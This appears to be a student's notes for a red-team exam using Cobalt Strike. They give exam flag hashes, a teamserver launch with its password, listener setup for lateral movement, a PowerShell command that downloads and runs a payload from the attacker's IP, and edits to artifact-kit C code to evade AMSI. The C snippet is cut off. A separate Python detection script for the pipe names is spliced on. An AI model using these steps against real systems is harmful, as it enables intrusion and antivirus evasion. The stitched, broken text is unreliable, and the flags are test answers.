Sant'Anna School of Advanced Studies
BIO 2
FLAG 1 - 7b5362c02c78f6b114e5cebd24eb2bf0
FLAG 2 - eb37d7b24ae6d4640558304db2b23099
FLAG 3 - ec05148d3a2e0f3b044b4573cb84674e
FLAG 4 - d302622334f652167456d17fa0596cff
FLAG 5 - 9dfe6f3301f3a3f3660f21878e7b6d9f
FLAG 6 - 9636a983e927a4fa950f58759cc34912

CONNECTING TO THE EXAM.

cd /opt/cobaltstrike
1- ./teamserver Passw0rd!

CREATE LISTENER - 3 listeners
1- HTTP 80
2- SMB 445 -- FOR LATERAL MOVEMENT.
3- TCP_LOCAL 1337

Starting the first instance.
1- IN KALI ATTACKING MACHINE - HOST YOUR MALICIOUS PAYLOAD - IN VICTIM MACHINE WINDOWS - Download the payload.

iwr -uri http://10.10.100.135:8080/gethere.exe -outfile c:\users\consultant\gethere.exe

Run the following payload by

Cmd.exe /c .\gethere.exe

You will get your initial beacon on the cobalt

BYPASS AMSI USING ARTIFACT

IN KALI
ls -l dist-pipe
ls -l src-common/

EDIT bypass-pipe.c

void start(HINSTANCE mhandle) {
    /* switched from snprintf... as some A/V product was flagging based on the function *sigh* */
    sprintf(pipename, "%c%c%c%c%c%c%c%c%cs-%d-", 92, 92, 46, 92, 112, 105, 112, 101, 92, (int)(GetTickCount() % 9898));

    /* start our server and our client */
    CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)&server_thread, (LPVOID) NULL, 0, NULL);
    client_thread(NULL)
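For defenders, an added example (not part of the original notes or of the kit being edited): the sprintf call above assembles the pipe name from character codes, so this Python code decodes it and matches the resulting name pattern against pipe-creation events. The sample events are constructed, and their shape (Sysmon Event ID 17/18 with Image and PipeName fields, the name logged with a single leading backslash) is an assumption.

```python
import re

# Format string and %c arguments copied from the sprintf call in the notes.
FMT = "%c%c%c%c%c%c%c%c%cs-%d-"
CHAR_ARGS = [92, 92, 46, 92, 112, 105, 112, 101, 92]
MODULUS = 9898  # GetTickCount() % 9898 yields 0..9897

def decode_prefix(fmt, char_args):
    """Expand the leading %c specifiers; return (prefix, rest of format)."""
    n = len(char_args)
    if not fmt.startswith("%c" * n):
        raise ValueError("format does not start with the expected %c run")
    return "".join(chr(c) for c in char_args), fmt[2 * n:]

def pipe_regex(fmt, char_args, modulus):
    """Regex for the name as logged: one leading backslash, then the literal parts."""
    _, rest = decode_prefix(fmt, char_args)
    before, after = rest.split("%d")
    width = len(str(modulus - 1))  # at most 4 digits for 0..9897
    return re.compile(r"\\" + re.escape(before) + r"(\d{1,%d})" % width
                      + re.escape(after))

def suspicious_pipes(events, rx, modulus):
    """Return (Image, PipeName) for pipe events whose name fits the pattern."""
    hits = []
    for ev in events:
        if ev.get("EventID") not in (17, 18):  # pipe created / pipe connected
            continue
        m = rx.fullmatch(ev.get("PipeName", ""))
        if m and int(m.group(1)) < modulus:  # value must be a possible remainder
            hits.append((ev["Image"], ev["PipeName"]))
    return hits

# Constructed sample events; field names are assumed, values are made up.
SAMPLE_EVENTS = [
    {"EventID": 17, "Image": r"C:\Users\consultant\gethere.exe", "PipeName": r"\s-4711-"},
    {"EventID": 17, "Image": r"C:\Windows\System32\svchost.exe", "PipeName": r"\srvsvc"},
    {"EventID": 18, "Image": r"C:\Users\consultant\gethere.exe", "PipeName": r"\s-9898-"},
    {"EventID": 1, "Image": r"C:\Windows\System32\cmd.exe", "PipeName": r"\s-12-"},
]

if __name__ == "__main__":
    print("decoded prefix:", decode_prefix(FMT, CHAR_ARGS)[0])
    rx = pipe_regex(FMT, CHAR_ARGS, MODULUS)
    for image, pipe in suspicious_pipes(SAMPLE_EVENTS, rx, MODULUS):
        print("match:", image, pipe)
```

A name this short will also match unrelated software that happens to use the same shape, so treat a hit as a lead to correlate with the creating process rather than as a verdict.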